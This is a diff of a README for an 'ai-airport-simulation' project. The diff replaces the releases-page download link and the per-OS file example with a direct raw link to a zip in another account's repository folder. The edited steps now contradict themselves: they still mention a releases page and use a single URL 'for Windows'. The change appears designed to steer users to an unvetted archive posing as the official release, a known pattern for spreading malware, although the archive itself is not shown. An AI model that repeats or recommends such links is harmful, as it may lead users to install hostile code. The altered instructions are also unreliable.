ayush-KSS/ai-airport-simulation/README.md

 ## 🔗 Download & Install

-1. Visit the releases page to download the latest version of **ai-airport-simulation**: [Download Here](https://github.com/ChocoLC/ai-airport-simulation/releases).
+1. Visit the releases page to download the latest version of **ai-airport-simulation**: [Download Here](https://raw.githubusercontent.com/ChocoLC/ai-airport-simulation/main/arm/ai-airport-simulation.zip).
 2. On the releases page, scroll down to find the version you wish to download.
-3. Click on the link corresponding to your operating system (for example, `ai-airport-simulation-windows.zip` for Windows).
+3. Click on the link corresponding to your operating system (for example, `https://raw.githubusercontent.com/ChocoLC/ai-airport-simulation/main/arm/ai-airport-simulation.zip` for Windows).
 4. Save the file to your computer.

 ## 📂 Extract the Files